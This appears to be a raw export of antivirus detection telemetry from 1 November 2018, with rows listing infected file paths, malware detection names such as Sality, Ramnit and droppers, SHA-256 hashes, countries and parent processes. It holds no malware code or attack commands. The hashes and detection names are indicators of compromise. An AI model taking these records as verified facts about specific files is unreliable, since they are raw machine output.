  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d2b55f9799a5e62708a35d9fcbd36b54cc79234a47a1079f1494707b505b6a6b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T23:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proteus 8_3sp2 .scr', filepath='H:\\Proteus 8_3sp2 .scr', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='d2b9fdf0d1a4944e826fda5c155f6555f02be753ca74269c381a7d992c106a10', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T06:49:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccs pic c compiler pcwdh 4.114 full version .scr', filepath='H:\\ccs pic c compiler pcwdh 4.114 Full Version .scr', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='d2b9fdf0d1a4944e826fda5c155f6555f02be753ca74269c381a7d992c106a10', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T06:49:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iostream.exe', filepath='C:\\ProgramData\\Iostream.exe', filesize=1792000, name='HEUR/AGEN.1011967.#M1.#R1'), hash='d2e26dc915778acee9c3820217fb869a5709ba58bd42a9b56ebcd0fecb44ff0c', metadata=Row(cmdline='{DED7F7AE-15A5-49F2-98BE-00C47194E8E6} S-1-5-21-2608386558-3963690224-2861772362-1000:user-PC\\\\\\\\user:Interactive:[1]', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T07:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Adobe Photoshop CS2\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d3050b412e2913a0a912ffa0d79ab149a148e4f2cf624d8a2de34b0edb5d8bb3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{07D3CB25-7F85-41AB-823A-1A37E2FE5C1D}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='d316f0bd11ab26a84824a6a72f555b5ee2236cb231251c67590600f3765bb70d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwr_server_behaviors_sb_33.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_server_behaviors_sb_33.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d33ddce829b0e380244358922c831c331dbab3722bbc94bc835f430157e22625', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T09:11:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh64c8.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH64C8.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='d343102e68b12246d7efcc2c07f1b8dd8957f2f1dedd32da1a7cd846b88e9efe', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D35112F8C0292CE04CCEA68A37747FD9270F5901C6D566C65FE7249499FDC72B', filesize=176000, name='W32/Neshta.A.#M1.#R1'), hash='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D35112F8C0292CE04CCEA68A37747FD9270F5901C6D566C65FE7249499FDC72B', filesize=176000, name='W32/Neshta.A.#M1.#R1'), hash='d35112f8c0292ce04ccea68a37747fd9270f5901c6d566c65fe7249499fdc72b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:11:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D35334F3EDF905384E89A5B0231AE52EEFC8F64FF8995A6DF7EF28BA2B55714A', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d3a557fa93d660dd05990aeee041a6d12af777edcff23ef0e6e09005563d9e47', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T08:12:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='d3e11f8c6582a712117aabe43b2622a96bb4f9f5af2f6c9ee526e094ac80145a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bein tvv.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bein tvv.exe', filesize=768000, name='TR/Dldr.Zampol.d40f64.#M1.#R1'), hash='d40f64b351bfbdb11ac5e13165810e670b7fdf3dfc27a46bfe02458be4542439', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\bein tvv.exe', parentsize=768000, timestamp='2018-11-01T11:06:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120909-0745dc8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57e73b18\\AVSCAN-20181101-120805-FE3FD36B\\AVSCAN-20181101-120909-0745DC8B', filesize=768000, name='TR/Dldr.Zampol.d40f64.#M1.#R1'), hash='d40f64b351bfbdb11ac5e13165810e670b7fdf3dfc27a46bfe02458be4542439', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120854-0532db2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57e73b18\\AVSCAN-20181101-120805-FE3FD36B\\AVSCAN-20181101-120854-0532DB2E', filesize=768000, name='TR/Dldr.Zampol.d40f64.#M1.#R1'), hash='d40f64b351bfbdb11ac5e13165810e670b7fdf3dfc27a46bfe02458be4542439', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:44:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:42:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:16:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:07:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:42:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d4401a19084ad558c5d1657c1c36fc5c1e5152af3e9bd2a9f0425207fb58849e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D4401A19084AD558C5D1657C1C36FC5C1E5152AF3E9BD2A9F0425207FB58849E', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='d4401a19084ad558c5d1657c1c36fc5c1e5152af3e9bd2a9f0425207fb58849e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:00:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074454-628674a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074454-628674A5', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:48:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095027-c2da2e53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-095027-C2DA2E53', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:53:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='minipure.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\minipure.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T02:13:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094839-ab84b4c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094839-AB84B4C6', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:51:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074626-763f2b65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074626-763F2B65', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074553-6f2d8a67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074553-6F2D8A67', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074717-8144ddb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074717-8144DDB4', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:50:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162609-92490caf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_44a5bd87\\AVSCAN-20181101-162429-83456BF7\\AVSCAN-20181101-162609-92490CAF', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:26:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101640-58c1401d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_223726da\\AVSCAN-20181101-101623-558AF057\\AVSCAN-20181101-101640-58C1401D', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101640-58c1401d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_223726da\\AVSCAN-20181101-101623-558AF057\\AVSCAN-20181101-101640-58C1401D', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094859-afecb1dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094859-AFECB1DD', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:52:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094922-b4bbdefa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094922-B4BBDEFA', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:52:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094948-ba5acc3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094948-BA5ACC3C', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:52:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='minipure.exe', filepath='\\\\?\\C:\\Program Files (x86)\\SmartCloudInput\\1.2.6.0329\\MiNiPure.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='minipure.exe', filepath='c:\\program files\\smartcloudinput\\1.3.5.10910\\minipure.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T08:15:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074523-68d00fcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074523-68D00FCB', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:48:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125541-6791fb69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a54a3c7\\AVSCAN-20181101-125443-5FDB160C\\AVSCAN-20181101-125541-6791FB69', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:55:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\usgi1s1einj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vck1uciijtz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xumvimxey52\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541047614.5bda853e876ec', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\701317936.exe', parentsize=671232, timestamp='2018-11-01T11:50:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vck1uciijtz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\h1lr3rq0jq3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\g5dwikhyj1u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:38:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ikdpqneqawi\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T04:21:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ab4rlhvj0m2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T02:21:55Z'), dt=datetime.date(2018, 11, 1)),
